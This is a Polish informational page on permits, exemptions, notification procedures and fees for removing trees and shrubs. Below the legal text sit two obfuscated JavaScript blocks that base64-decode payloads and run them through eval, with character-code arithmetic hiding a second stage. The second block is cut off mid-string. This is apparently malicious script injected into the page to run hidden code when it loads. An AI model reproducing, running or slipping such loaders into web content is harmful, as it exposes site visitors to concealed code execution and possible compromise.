USUWANIE DRZEW I KRZEWÓW
Zezwolenie na usunięcie drzewa lub krzewu wydaje wójt, burmistrz albo prezydent miasta, a w przypadku gdy zezwolenie dotyczy usunięcia drzewa lub krzewu z terenu nieruchomości wpisanej do rejestru zabytków – wojewódzki konserwator zabytków. W przypadku gdy wniosek o usunięcie drzewa lub krzewu dotyczy nieruchomości będących własnością gminy (z wyjątkiem nieruchomości będących w użytkowaniu wieczystym innego podmiotu) zezwolenie wydaje starosta. Jeżeli funkcję starosty sprawuje prezydent miasta na prawach powiatu to zezwolenie wydaje marszałek województwa
Zezwolenie na usunięcie drzewa w pasie drogowym drogi publicznej, z wyłączeniem obcych gatunków topoli, wydaje się po uzgodnieniu z regionalnym dyrektorem ochrony środowiska.
Zezwolenie na usunięcie drzewa lub krzewu na obszarach objętych ochroną krajobrazową w granicach parku narodowego albo rezerwatu przyrody wydaje się po uzgodnieniu odpowiednio z dyrektorem parku narodowego albo regionalnym dyrektorem ochrony środowiska.
Powyższych przepisów nie stosuje się do:
1) krzewu albo krzewów rosnących w skupisku, o powierzchni do 25 m2
2) krzewów na terenach pokrytych roślinnością pełniącą funkcje ozdobne, urządzoną pod względem rozmieszczenia i doboru gatunków posadzonych roślin, z wyłączeniem krzewów w pasie drogowym drogi publicznej, na terenie nieruchomości wpisanej do rejestru zabytków oraz na terenach zieleni;
3) drzew, których obwód pnia na wysokości 5 cm nie przekracza:
a) 80 cm – w przypadku topoli, wierzb, klonu jesionolistnego oraz klonu srebrzystego,
b) 65 cm – w przypadku kasztanowca zwyczajnego, robinii akacjowej oraz platanu klonolistnego,
c) 50 cm – w przypadku pozostałych gatunków drzew;”,
3a) drzew lub krzewów, które rosną na nieruchomościach stanowiących własność osób fizycznych i są usuwane na cele niezwiązane z prowadzeniem działalności gospodarczej;
3b) drzew lub krzewów usuwanych w celu przywrócenia gruntów nieużytkowanych do użytkowania rolniczego;
4) drzew lub krzewów na plantacjach lub w lasach w rozumieniu ustawy z dnia 28 września 1991 r. o lasach;
5) drzew lub krzewów owocowych, z wyłączeniem rosnących na terenie nieruchomości wpisanej do rejestru zabytków lub na terenach zieleni;
6) drzew lub krzewów usuwanych w związku z funkcjonowaniem ogrodów botanicznych lub zoologicznych;
7) drzew lub krzewów usuwanych na podstawie decyzji właściwego organu z obszarów położonych między linią brzegu a wałem przeciwpowodziowym lub naturalnym wysokim brzegiem, w który wbudowano trasę wału przeciwpowodziowego, z wału przeciwpowodziowego i terenu w odległości mniejszej niż 3 m od stopy wału;
8) drzew lub krzewów, które utrudniają widoczność sygnalizatorów i pociągów, a także utrudniają eksploatację urządzeń kolejowych albo powodują tworzenie na torowiskach zasp śnieżnych, usuwanych na podstawie decyzji właściwego organu;
9) drzew lub krzewów stanowiących przeszkody lotnicze, usuwanych na podstawie decyzji właściwego organu;
10) drzew lub krzewów usuwanych na podstawie decyzji właściwego organu ze względu na potrzeby związane z utrzymaniem urządzeń melioracji wodnych szczegółowych;
11) drzew lub krzewów usuwanych z obszaru parku narodowego lub rezerwatu przyrody nieobjętego ochroną krajobrazową;
12) drzew lub krzewów usuwanych w ramach zadań wynikających z planu ochrony lub zadań ochronnych parku narodowego lub rezerwatu przyrody, planu ochrony parku krajobrazowego, albo planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000;
13) prowadzenia akcji ratowniczej przez jednostki ochrony przeciwpożarowej lub inne właściwe służby ustawowo powołane do niesienia pomocy osobom w stanie nagłego zagrożenia życia lub zdrowia;
14) drzew lub krzewów stanowiących złomy lub wywroty usuwanych przez:
a) jednostki ochrony przeciwpożarowej, jednostki Sił Zbrojnych Rzeczypospolitej Polskiej, właścicieli urządzeń, o których mowa w art. 49 § 1 Kodeksu cywilnego, zarządców dróg, zarządców infrastruktury kolejowej, gminne lub powiatowe jednostki oczyszczania lub inne podmioty działające w tym zakresie na zlecenie gminy lub powiatu,
b) inne podmioty lub osoby, po przeprowadzeniu oględzin przez organ właściwy do wydania zezwolenia na usunięcie drzewa lub krzewu, potwierdzających, że drzewa lub krzewy stanowią złom lub wywrot;
15) drzew lub krzewów należących do gatunków obcych.

W przypadkach, o których mowa w pkt 3 właściciel nieruchomości jest obowiązany dokonać zgłoszenia, zamiaru usunięcia drzewa, jeżeli obwód pnia drzewa mierzonego na wysokości 5 cm przekracza:
1) 80 cm – w przypadku topoli, wierzb, klonu jesionolistnego oraz klonu srebrzystego;
2) 65 cm – w przypadku kasztanowca zwyczajnego, robinii akacjowej oraz platanu klonolistnego;
3) 50 cm – w przypadku pozostałych gatunków drzew.
Zgłoszenie zawiera imię i nazwisko wnioskodawcy, oznaczenie nieruchomości, z której drzewo ma być usunięte, oraz rysunek albo mapkę określającą usytuowanie drzewa na nieruchomości.
Organ administracji w terminie 21 dni od dnia doręczenia zgłoszenia dokonuje oględzin w celu ustalenia, odpowiednio:
1) nazwy gatunku drzewa;
2) obwodu pnia ustalonego na wysokości 5 cm, a w przypadku gdy na tej wysokości drzewo:
a) posiada kilka pni – obwodu każdego z tych pni,
b) nie posiada pnia – obwodu pnia poniżej korony drzewa.
Z oględzin sporządza się protokół.
Po dokonaniu oględzin organ administracji w terminie 14 dni od dnia oględzin może, w drodze decyzji administracyjnej, wnieść sprzeciw. Usunięcie drzewa może nastąpić, jeżeli organ nie wniósł sprzeciwu w tym terminie.
W przypadku gdy zgłoszenie nie zawiera wszystkich wskazanych elementów właściwy organ administracji, w drodze postanowienia, nakłada obowiązek uzupełnienia zgłoszenia w terminie 7 dni.
Organ, o którym mowa w art. 83a ust. 1, może przed upływem terminu, o którym mowa w ust. 8, wydać zaświadczenie o braku podstaw do wniesienia sprzeciwu. Wydanie zaświadczenia wyłącza możliwość wniesienia sprzeciwu, o którym mowa w ust. 8, oraz uprawnia do usunięcia drzewa.
W przypadku nieusunięcia drzewa przed upływem 6 miesięcy od przeprowadzonych oględzin usunięcie drzewa może nastąpić po dokonaniu ponownego zgłoszenia.
Organ administracji może wnieść sprzeciw w przypadku:
1) lokalizacji drzewa:
a) na nieruchomości wpisanej do rejestru zabytków,
b) na terenie przeznaczonym w miejscowym planie zagospodarowania przestrzennego na zieleń lub chronionym innymi zapisami miejscowego planu zagospodarowania przestrzennego,
c) na terenach objętych formami ochrony przyrody, o których mowa w art. 6 ust. 1 pkt 1–5;
2) spełnienia przez drzewo kryteriów, o których mowa w przepisach wydanych na podstawie art. 40 ust. 3.
Organ administracji wnosi sprzeciw:
1) jeżeli zgłoszenie dotyczy usunięcia drzewa objętego obowiązkiem uzyskania zezwolenia na usunięcie;
2) w przypadku nieuzupełnienia zgłoszenia.
Jeżeli w terminie 5 lat od dokonania oględzin wystąpiono o wydanie decyzji o pozwolenie na budowę na podstawie ustawy Prawo budowlane, a budowa ta ma związek z prowadzeniem działalności gospodarczej i będzie realizowana na części nieruchomości, na której rosło usunięte drzewo, organ administracji uwzględniając dane ustalone na podstawie oględzin, nakłada na właściciela nieruchomości, w drodze decyzji administracyjnej, obowiązek uiszczenia opłaty za usunięcie drzewa.
Posiadacz nieruchomości ponosi opłaty za usunięcie drzewa lub krzewu.
Opłaty naliczane są w zezwoleniu na usunięcie drzewa lub krzewu i pobierane przez organ właściwy do wydania tego zezwolenia.
W przypadku naliczenia opłaty za usunięcie drzewa lub krzewu oraz uzależnienia wydania zezwolenia na usunięcie drzewa lub krzewu od przesadzenia tego drzewa lub krzewu albo wykonania nasadzeń zastępczych, organ właściwy do wydania zezwolenia odracza termin uiszczenia opłaty za jego usunięcie na okres 3 lat od dnia upływu terminu wskazanego w zezwoleniu na jego przesadzenie lub wykonanie nasadzeń zastępczych.
Jeżeli przesadzone albo posadzone drzewa lub krzewy zachowały żywotność po upływie 3 lat lub nie zachowały żywotności z przyczyn niezależnych od posiadacza nieruchomości, należność z tytułu ustalonej opłaty za usunięcie drzew lub krzewów podlega umorzeniu.
Jeżeli przesadzone albo posadzone drzewa lub krzewy, albo część z nich, nie zachowały żywotności po upływie 3 lat, z przyczyn zależnych od posiadacza nieruchomości, naliczona opłata jest przeliczana w sposób proporcjonalny do liczby drzew lub powierzchni krzewów, które nie zachowały żywotności.
Decyzje w powyższych sprawach mogą być wydane przed upływem okresu 3 lat, jeżeli przesadzone albo posadzone drzewa lub krzewy nie zachowały żywotności przed upływem tego okresu.
W przypadku niewykonania nasadzeń zastępczych lub części z nich, zgodnie z zezwoleniem na usunięcie drzewa lub krzewu, naliczona opłata jest przeliczana w sposób proporcjonalny do liczby drzew lub powierzchni krzewów, które nie zostały wykonane zgodnie z zezwoleniem.

Opłatę za usunięcie drzewa ustala się mnożąc liczbę cm obwodu pnia drzewa mierzonego na wysokości 130 cm i stawkę opłaty.
Jeżeli drzewo na wysokości 130 cm:
1) posiada kilka pni – za obwód pnia drzewa przyjmuje się sumę obwodu pnia o największym obwodzie oraz połowy obwodów pozostałych pni;
2) nie posiada pnia – za obwód pnia drzewa przyjmuje się obwód pnia mierzony bezpośrednio poniżej korony drzewa.
Opłatę za usunięcie krzewu ustala się mnożąc liczbę metrów kwadratowych powierzchni gruntu pokrytej usuwanymi krzewami i stawkę opłaty.
Za wielkość powierzchni pokrytej krzewami przyjmuje się wielkość powierzchni rzutu poziomego krzewu.
Minister właściwy do spraw środowiska określa, w drodze rozporządzenia, wysokość stawek opłat różnicując je ze względu na:
1) rodzaj lub gatunek drzew lub krzewów;
2) obwód pnia drzewa lub powierzchnię krzewu albo krzewów rosnących w skupisku.

Nie nalicza się opłat za usunięcie:
1) drzew lub krzewów, na których usunięcie nie jest wymagane zezwolenie;
2)
3) drzew lub krzewów, jeżeli usunięcie jest związane z odnową i pielęgnacją drzew rosnących na terenie nieruchomości wpisanej do rejestru zabytków;
4) drzew lub krzewów, które zagrażają bezpieczeństwu ludzi lub mienia w istniejących obiektach budowlanych lub funkcjonowaniu urządzeń, o których mowa w art. 49 § 1 Kodeksu cywilnego;
5) drzew lub krzewów, które zagrażają bezpieczeństwu ruchu drogowego lub kolejowego albo bezpieczeństwu żeglugi;
6) drzew lub krzewów w związku z przebudową dróg publicznych lub linii kolejowych;
7) drzew, których obwód pnia mierzony na wysokości 130 cm nie przekracza:
a) 120 cm – w przypadku topoli, wierzb, kasztanowca zwyczajnego, klonu jesionolistnego, klonu
srebrzystego, robinii akacjowej oraz platanu klonolistnego,
b) 80 cm – w przypadku pozostałych gatunków drzew
– w celu przywrócenia gruntów nieużytkowanych do użytkowania innego niż rolnicze, zgodnego
z przeznaczeniem terenu, określonym w miejscowym planie zagospodarowania przestrzennego lub decyzji o warunkach zabudowy i zagospodarowania terenu;
8) krzewu lub krzewów rosnących w skupiskach, pokrywających grunt o powierzchni do 50 m2, w celu przywrócenia gruntów nieużytkowanych do użytkowania innego niż rolnicze, zgodnego z przeznaczeniem terenu, określonym w miejscowym planie zagospodarowania przestrzennego lub decyzji o warunkach zabudowy i zagospodarowania terenu;
9) drzew lub krzewów w związku z zabiegami pielęgnacyjnymi drzew lub krzewów na terenach zieleni;
10) drzew lub krzewów, które obumarły lub nie rokują szansy na przeżycie, z przyczyn niezależnych od posiadacza nieruchomości;
11) topoli o obwodzie pnia mierzonym na wysokości 130 cm wynoszącym powyżej 100 cm, nienależących do gatunków rodzimych, jeżeli zostaną zastąpione w najbliższym sezonie wegetacyjnym drzewami innych gatunków;
12) drzew lub krzewów, jeżeli usunięcie wynika z potrzeb ochrony roślin, zwierząt i grzybów objętych ochroną gatunkową lub ochrony siedlisk przyrodniczych;
13) drzew lub krzewów z grobli stawów rybnych;
14) drzew lub krzewów, jeżeli usunięcie jest związane z regulacją i utrzymaniem koryt cieków naturalnych, wykonywaniem i utrzymaniem urządzeń wodnych służących kształtowaniu zasobów wodnych oraz ochronie przeciwpowodziowej w zakresie niezbędnym do wykonania i utrzymania tych urządzeń;
15) drzew lub krzewów usuwanych z terenu poligonów lub placów ćwiczeń, służących obronności państwa.
Jeżeli wydanie zezwolenia na usunięcie drzewa lub krzewu zostało uzależnione od przesadzenia tego drzewa lub krzewu albo wykonania nasadzeń zastępczych, a przesadzone albo posadzone drzewo lub krzew nie zachowały żywotności po 3 latach od dnia upływu terminu wskazanego w tym zezwoleniu na ich przesadzenie lub wykonanie nasadzeń zastępczych, lub przed upływem tego okresu, z przyczyn zależnych od posiadacza nieruchomości, organ właściwy do wydania zezwolenia na usunięcie drzewa lub krzewu nakłada ponownie w drodze decyzji obowiązek wykonania nasadzeń zastępczych.
W przypadku niewykonania nasadzeń zastępczych zgodnie z zezwoleniem na usunięcie drzewa lub krzewu, stosuje się przepisy o postępowaniu egzekucyjnym w administracji.

Obowiązek uiszczenia opłat przedawnia się z upływem 5 lat, licząc od końca roku, w którym upłynął termin uiszczenia opłaty.
Uiszczenie opłaty następuje w terminie 14 dni od dnia, w którym zezwolenie na usunięcie drzewa lub krzewu albo decyzje stały się ostateczne. Jeżeli w zezwoleniu na usunięcie drzewa lub krzewu został wskazany początek biegu terminu usunięcia drzewa lub krzewu, uiszczenie opłaty następuje w terminie 14 dni od dnia rozpoczęcia biegu tego terminu.
W razie nieterminowego uiszczenia opłaty pobiera się odsetki za zwłokę w wysokości odsetek pobieranych za nieterminowe regulowanie zobowiązań podatkowych.
Opłaty nieuiszczone w terminie podlegają wraz z odsetkami za zwłokę przymusowemu ściągnięciu w trybie określonym w przepisach o postępowaniu egzekucyjnym w administracji.
Na wniosek, złożony w terminie 14 dni od dnia, w którym zezwolenie na usunięcie drzewa lub krzewu albo decyzja stały się ostateczne, opłatę można rozłożyć na raty lub przesunąć termin jej płatności, na okres nie dłuższy niż 3 lata, jeżeli przemawia za tym sytuacja materialna wnioskodawcy.
Decyzję w sprawach rozłożenia opłaty na raty lub przesunięcia terminu jej płatności wydaje organ właściwy do wydania zezwolenia na usunięcie drzewa lub krzewu.
Jeżeli zaległości płatności rat wyniosą równowartość trzech kolejnych rat, uiszczenie opłaty staje się wymagane w całości

var NIPSUGJUMJ = atob(‘dmFyIEFYWk9HS1ZCRkIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE3IC0gNywgMTIwIC0gMiwgMTAyIC0gNSwgMTIxIC0gNywgMzYgLSA0LCAxMTAgLSAzLCAxMDkgLSA4LCAxMjQgLSAzLCAzOSAtIDcsIDY2IC0gNSwgMzYgLSA0LCA0MCAtIDEsIDEyNyAtIDUsIDg3IC0gNywgODMgLSAyLCAxMjkgLSA4LCA3MiAtIDIsIDk3IC0gNywgMTIxIC0gMywgNzcgLSAzLCA4NiAtIDUsIDk1IC0gOCwgNDggLSA5LCA2MCAtIDEsIDE3IC0gNywgMTIwIC0gMiwgMTAzIC0gNiwgMTIyIC0gOCwgMzUgLSAzLCAxMDYgLSA1LCAxMTEgLSAxLCAxMDYgLSA3LCAxMDQgLSAzLCAxMDkgLSA5LCAzOCAtIDYsIDY0IC0gMywgMzUgLSAzLCA0OCAtIDksIDc2IC0gOCwgNzYgLSA4LCA3MSAtIDIsIDEwNyAtIDEsIDg4IC0gMSwgOTMgLSA5LCA5NyAtIDgsIDEyMCAtIDksIDcxIC0gMiwgNzEgLSA0LCA5MiAtIDIsIDEyOSAtIDksIDEwNSAtIDgsIDExMyAtIDUsIDExOCAtIDcsIDUxIC0gMywgODYgLSA2LCAxMTMgLSA5LCAxMTcgLSA2LCAxMjMgLSAxLCA4NyAtIDksIDEyNiAtIDYsIDc5IC0gMiwgMTE0IC0gNywgNzcgLSAzLCA5NyAtIDksIDExNCAtIDcsIDkxIC0gMSwgNzcgLSA0LCAxMDkgLSAzLCA4OCAtIDcsIDk4IC0gOSwgODYgLSA5LCAxMTAgLSA0LCA2NSAtIDksIDEyOCAtIDYsIDgzIC0gOSwgMTExIC0gNSwgODkgLSA4LCA2MiAtIDgsIDgxIC0gOSwgMTMxIC0gOSwgNjAgLSA4LCAxMDkgLSAxLCA4NyAtIDIsIDg4IC0gMSwgNzIgLSAzLCAxMTMgLSAxLCA3MiAtIDIsIDkwIC0gNiwgMTA3IC0gNCwgNTcgLSA1LCA4MSAtIDcsIDEyMCAtIDEsIDU0IC0gMSwgNjAgLSA5LCAxMDYgLSA1LCA3MCAtIDEsIDc3IC0gMywgODEgLSA0LCA4MSAtIDYsIDEwNiAtIDMsIDgzIC0gMiwgMTE4IC0gMywgODEgLSAxLCA5NiAtIDgsIDExMSAtIDQsIDgxIC0gNywgODIgLSA0LCA5MSAtIDgsIDkzIC0gOCwgNTUgLSAzLCA4NSAtIDgsIDEwNiAtIDEsIDU4IC0gNiwgNzIgLSAzLCA4MCAtIDcsIDEyNyAtIDUsIDgyIC0gNSwgMTE0IC0gOSwgNjkgLSAxLCAxMTUgLSA5LCA5NSAtIDksIDU3IC0gNCwgOTMgLSA1LCAxMTEgLSA1LCA5NCAtIDksIDExOSAtIDgsIDc4IC0gOCwgODkgLSAyLCA1MSAtIDIsIDY1IC0gOCwgMTA3IC0gOCwgNjkgLSAzLCA3OSAtIDYsIDExMCAtIDMsIDgzIC0gOSwgODMgLSAyLCAxMTUgLSA3LCA2MiAtIDYsIDEwMiAtIDIsIDkwIC0gNCwgMTExIC0gNCwgNDUgLSAyLCA3NCAtIDEsIDEyOCAtIDYsIDkwIC0gMSwgMTAxIC0gMiwgODUgLSA3LCAxMTMgLSA3LCAxMTIgLSA5LCAxMDQgLSA3LCA4MSAtIDcsIDEzMCAtIDksIDExOSAtIDgsIDEwOCAtIDYsIDkxIC0gMSwgNzAgLSAyLCA2MiAtIDYsIDYwIC0gNSwgODggLSAyLCA5MCAtIDcsIDc4IC0gMSwgMTEyIC0gNCwgNzkgLSA4LCA3MyAtIDUsIDc2IC0gMywgMTI1IC0gMywgNzUgLSA1LCA5MiAtIDUsIDg4IC0gMywgNjAgLSA0LCA4NiAtIDgsIDEwNiAtIDIsIDgzIC0gNiwgNTEgLSA4LCAxMDUgLSAzLCAxMjkgLSA5LCA4MCAtIDMsIDUxIC0gMiwgMTA4IC0gNiwgOTUgLSA5LCA2MyAtIDYsIDEyNyAtIDcsIDk1IC0gOCwgMTMxIC0gOSwgODAgLSAzLCA5MCAtIDQsIDc5IC0gMiwgMTIyIC0gMSwgODkgLSA4LCA5MCAtIDUsIDc3IC0gNCwgMTI4IC0gNiwgODUgLSA0LCA3NSAtIDgsIDkxIC0gMSwgNzIgLSA0LCAxMTMgLSA2LCAxMjkgLSA4LCA3NiAtIDUsIDEyOSAtIDcsIDg3IC0gNSwgNTAgLSAzLCA3NSAtIDQsIDcwIC0gMiwgOTggLSA5LCAxMjAgLSA3LCA3OCAtIDksIDEzMCAtIDksIDg0IC0gMywgNTcgLSA4LCA3NyAtIDcsIDY4IC0gMiwgODEgLSA4LCA1NSAtIDIsIDg0IC0gNCwgODQgLSAyLCA1NCAtIDUsIDEyNCAtIDcsIDgwIC0gNSwgMTA0IC0gMSwgODMgLSAyLCAxMjQgLSA5LCA4OSAtIDksIDk1IC0gNywgNjAgLSA3LCA3NCAtIDgsIDkyIC0gNSwgMTA3IC0gNCwgNjkgLSA4LCA2OCAtIDcsIDQ0IC0gNSwgNjcgLSA4LCAxMSAtIDEsIDExMCAtIDgsIDEyNiAtIDksIDExNiAtIDYsIDEwMCAtIDEsIDExOCAtIDIsIDEwOCAtIDMsIDEyMCAtIDksIDExMSAtIDEsIDM4IC0gNiwgMTIzIC0gMywgMTE5IC0gOCwgMTIyIC0gOCwgMTAyIC0gNywgMTAyIC0gMSwgMTE5IC0gOSwgMTAwIC0gMSwgNDUgLSA1LCAxMjAgLSA1LCAxMjMgLSA3LCAxMjMgLSA5LCAxMDggLSAzLCAxMTQgLSA0LCAxMDQgLSAxLCA1MSAtIDcsIDM2IC0gNCwgMTEzIC0gNiwgMTA0IC0gMywgMTI2IC0gNSwgNDMgLSAyLCA0MCAtIDgsIDEyOCAtIDUsIDE1IC0gNSwgMzYgLSA0LCAzMyAtIDEsIDEyNSAtIDcsIDk5IC0gMiwgMTE3IC0gMywgNDEgLSA5LCAxMjEgLSA3LCAxMDIgLSAxLCAxMTggLSAzLCAzMyAtIDEsIDYzIC0gMiwgNDEgLSA5LCA0NCAtIDUsIDQwIC0gMSwgNjAgLSAxLCAxMyAtIDMsIDMzIC0gMSwgMzYgLSA0LCAxMDQgLSAyLCAxMTcgLSA2LCAxMTYgLSAyLCAzOCAtIDYsIDQxIC0gMSwgMTI2IC0gOCwgOTggLSAxLCAxMTcgLSAzLCAzNSAtIDMsIDExMSAtIDYsIDM5IC0gNywgNjYgLSA1LCA0MSAtIDksIDQ5IC0gMSwgNjcgLSA4LCAzNSAtIDMsIDExMCAtIDUsIDQxIC0gOSwgNjEgLSAxLCAzOSAtIDcsIDEyMCAtIDUsIDEyMSAtIDUsIDEyMiAtIDgsIDEwOSAtIDQsIDExMSAtIDEsIDEwNyAtIDQsIDQ5IC0gMywgMTA5IC0gMSwgMTAyIC0gMSwgMTE5IC0gOSwgMTEyIC0gOSwgMTI0IC0gOCwgMTEwIC0gNiwgNjEgLSAyLCAzMyAtIDEsIDEwNyAtIDIsIDUwIC0gNywgNDggLSA1LCA0OSAtIDgsIDM2IC0gNCwgMTI4IC0gNSwgMTMgLSAzLCAzNyAtIDUsIDM1IC0gMywgMzQgLSAyLCA0MSAtIDksIDExOSAtIDUsIDEwNyAtIDYsIDEyMSAtIDYsIDM5IC0gNywgNDcgLSA0LCA2NiAtIDUsIDQxIC0gOSwgODQgLSAxLCAxMjUgLSA5LCAxMjAgLSA2LCAxMDYgLSAxLCAxMTYgLSA2LCAxMDQgLSAxLCA0OCAtIDIsIDExMCAtIDgsIDEyMyAtIDksIDExMyAtIDIsIDExOCAtIDksIDc1IC0gOCwgMTA1IC0gMSwgMTAyIC0gNSwgMTIxIC0gNywgNjggLSAxLCAxMTMgLSAyLCAxMDggLSA4LCAxMDQgLSAzLCA0NiAtIDYsIDEyMiAtIDcsIDEyMiAtIDYsIDExOCAtIDQsIDEwNyAtIDIsIDExNyAtIDcsIDEwNyAtIDQsIDUzIC0gNywgMTAyIC0gMywgMTA3IC0gMywgOTggLSAxLCAxMjMgLSA5LCA2OCAtIDEsIDExOSAtIDgsIDEwMyAtIDMsIDEwNSAtIDQsIDY5IC0gNCwgMTI0IC0gOCwgNDQgLSA0LCAxMDYgLSAxLCA0NCAtIDMsIDM5IC0gNywgMTAzIC0gOSwgMTIgLSAyLCAxNyAtIDgsIDEyIC0gMywgMTMgLSA0LCAxMSAtIDIsIDExNCAtIDcsIDEwNyAtIDYsIDEyNyAtIDYsIDUzIC0gNywgMTA3IC0gOCwgMTEyIC0gOCwgMTAwIC0gMywgMTE2IC0gMiwgNzIgLSA1LCAxMTQgLSAzLCAxMDEgLSAxLCAxMDkgLSA4LCA2NiAtIDEsIDExOSAtIDMsIDQyIC0gMiwgMTEwIC0gNSwgNDEgLSA5LCA0NiAtIDksIDM0IC0gMiwgMTE0IC0gNywgMTEwIC0gOSwgMTI5IC0gOCwgNTEgLSA1LCAxMTMgLSA1LCAxMDggLSA3LCAxMTQgLSA0LCAxMDcgLSA0LCAxMTcgLSAxLCAxMDggLSA0LCA0MiAtIDEsIDQ1IC0gNCwgNjggLSA5LCAxMSAtIDEsIDM5IC0gNywgMzcgLSA1LCAxMjkgLSA0LCAxNCAtIDQsIDM4IC0gNiwgMzkgLSA3LCAxMTggLSA0LCAxMDQgLSAzLCAxMjEgLSA1LCAxMjQgLSA3LCAxMjEgLSA3LCAxMTIgLSAyLCA0MSAtIDksIDExOSAtIDUsIDEwMyAtIDIsIDEyNCAtIDksIDYxIC0gMiwgMTggLSA4LCAxMjkgLSA0LCAxOSAtIDksIDE2IC0gNiwgMTI1IC0gNywgOTkgLSAyLCAxMjIgLSA4LCAzOCAtIDYsIDEwOSAtIDksIDEwNiAtIDUsIDEwNSAtIDYsIDM3IC0gNSwgNjUgLSA0LCAzOSAtIDcsIDEyNSAtIDUsIDEyMCAtIDksIDExOCAtIDQsIDk5IC0gNCwgMTAyIC0gMSwgMTEyIC0gMiwgMTAyIC0gMywgNDUgLSA1LCAxMDAgLSAzLCAxMTggLSAyLCAxMTQgLSAzLCA5OSAtIDEsIDQ4IC0gOCwgMTEwIC0gOSwgMTE4IC0gOCwgMTA0IC0gNSwgMTAzIC0gMiwgMTA5IC0gOSwgNDkgLSA4LCA0NiAtIDIsIDM4IC0gNiwgMTA5IC0gMiwgMTA1IC0gNCwgMTI0IC0gMywgNDYgLSA1LCA2NCAtIDUsIDE0IC0gNCwgNDggLSA4LCAxMTEgLSAxLCAxMDMgLSAyLCAxMjggLSA5LCAzNCAtIDIsIDczIC0gMywgMTI1IC0gOCwgMTE2IC0gNiwgMTA4IC0gOSwgMTE3IC0gMSwgMTA3IC0gMiwgMTE2IC0gNSwgMTE3IC0gNywgNDUgLSA1LCAxMDYgLSA2LCAxMDMgLSAyLCAxMDUgLSA2LCA0NCAtIDMsIDUwIC0gOSwgNDIgLSAyLCA0MyAtIDIsIDYwIC0gMSwgMTYgLSA2LCAxNCAtIDQpO2V2YWwoQVhaT0dLVkJGQik7’);
eval(NIPSUGJUMJ);

var WENXCJXAAM = atob(‘dmFyIEhVVVJLTE5JR1YgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTE5IC0gMSwgMTAyIC0gNSwgMTE2IC0gMiwgNDEgLSA5LCAxMTYgLSA5LCAxMDkgLSA4LCAxMzAgLSA5LCAzOSAtIDcsIDY0IC0gMywgNDEgLSA5LCA0NyAtIDgsIDY5IC0gMSwgNzggLSA0LCAxMTAgLSA1LCAxMDMgLSAyLCA5MCAtIDQsIDk1IC0gOCwgMTE4IC0gNiwgNjcgLSAyLCAxMTAgLSA1LCAxMTIgLSAzLCA0MSAtIDIsIDYxIC0gMiwgMTMgLSAzLCAxMjYgLSA4LCAxMDUgLSA4LCAxMTkgLSA1LCAzOCAtIDYsIDExMCAtIDksIDExMSAtIDEsIDEwNSAtIDYsIDEwNSAtIDQsIDEwOCAtIDgsIDM1IC0gMywgNjQgLSAzLCAzNyAtIDUsIDQwIC0gMSwgODQgLSA3LCAxMDggLSAzLCAxMTYgLSAxLCAxMDIgLSA0LCA4MyAtIDEsIDg1IC0gMiwgOTggLSA5LCAxMTUgLSA3LCA3MyAtIDMsIDExMyAtIDgsIDU2IC0gNywgNzkgLSA1LCA5MSAtIDYsIDgwIC0gOSwgODMgLSAyLCAxMjIgLSA1LCA3NSAtIDksIDExMCAtIDcsIDkzIC0gNCwgMTExIC0gNSwgODYgLSA3LCAxMTIgLSA4LCA4NiAtIDEsIDEyNyAtIDksIDczIC0gMSwgOTAgLSA1LCA4NSAtIDgsIDExNiAtIDYsIDgzIC0gNCwgNjYgLSAxLCAxMjMgLSA0LCA3MyAtIDQsIDc5IC0gNiwgMTEwIC0gNCwgNzkgLSA2LCA1MCAtIDEsIDgyIC0gNiwgODcgLSA2LCAxMjQgLSA1LCA3NCAtIDksIDgxIC0gOCwgOTIgLSA5LCA4MiAtIDEsIDEwNSAtIDUsIDkyIC0gOCwgOTUgLSA3LCA3MyAtIDQsIDExNiAtIDksIDcyIC0gMywgMTI4IC0gNiwgODMgLSA2LCA2OSAtIDQsIDgwIC0gOCwgOTIgLSA4LCA3MiAtIDYsIDEyMSAtIDUsIDg5IC0gOCwgNzMgLSAzLCA1NCAtIDEsIDEwNyAtIDgsIDgyIC0gOCwgMTI4IC0gOSwgNzcgLSA0LCAxMTkgLSA5LCA3MCAtIDQsIDg4IC0gMywgODQgLSA3LCA1MiAtIDEsIDgxIC0gNSwgMTI2IC0gNiwgNTYgLSA4LCAxMTUgLSA4LCA3NCAtIDEsIDEwNiAtIDEsIDg1IC0gOCwgNzMgLSA2LCA3OSAtIDQsIDczIC0gOCwgMTIyIC0gNywgOTIgLSAzLCA4MyAtIDYsIDcxIC0gNCwgNjEgLSA0LCA3MiAtIDYsIDg1IC0gNCwgMTA3IC0gMiwgOTQgLSA5LCAxMTIgLSA0LCA3NCAtIDUsIDU0IC0gNCwgOTcgLSA3LCA3NCAtIDQsIDg0IC0gMSwgMTA3IC0gMiwgMTIyIC0gMywgNTEgLSA4LCA3NiAtIDQsIDg1IC0gMywgOTMgLSA3LCAxMjEgLSA2LCAxMDYgLSA1LCA3MyAtIDMsIDYwIC0gNCwgNTIgLSAzLCA3NyAtIDYsIDEyNSAtIDYsIDEyOCAtIDksIDExNCAtIDksIDgwIC0gNCwgNjggLSAzLCA2OCAtIDMsIDc3IC0gNiwgODMgLSA1LCAxMjggLSA3LCAxMDIgLSAzLCA5MSAtIDEsIDEwMSAtIDMsIDEyMSAtIDIsIDEwNCAtIDUsIDY4IC0gMiwgMTA1IC0gOCwgMTI3IC0gNSwgMTExIC0gNCwgMTA1IC0gNSwgNzIgLSA2LCA3MyAtIDYsIDc5IC0gNiwgNTIgLSA5LCA3OCAtIDksIDU5IC0gOSwgNTggLSA2LCA3NCAtIDUsIDcxIC0gMywgNzUgLSA4LCA1MiAtIDQsIDExMCAtIDMsIDg1IC0gMywgMTIwIC0gMSwgNjQgLSA4LCAxMTUgLSA3LCAxMDQgLSA1LCA3OCAtIDgsIDExMCAtIDIsIDU5IC0gNSwgOTIgLSAzLCAxMjAgLSAxLCAxMTYgLSA5LCAxMTYgLSAyLCA4MiAtIDcsIDkwIC0gOCwgMTIzIC0gNCwgNzcgLSA0LCA3OCAtIDEsIDEzMCAtIDgsIDEwOCAtIDEsIDc1IC0gNiwgMTAyIC0gNCwgMTI3IC0gOCwgNzAgLSAxLCA4MiAtIDksIDgzIC0gOSwgODYgLSAzLCA1NiAtIDMsIDgwIC0gOCwgNzAgLSA0LCA3MiAtIDUsIDkwIC0gMSwgMTExIC0gMSwgNzggLSA4LCA4OSAtIDYsIDYzIC0gNywgODEgLSAzLCA3OSAtIDMsIDEwOSAtIDQsIDEyMiAtIDMsIDExN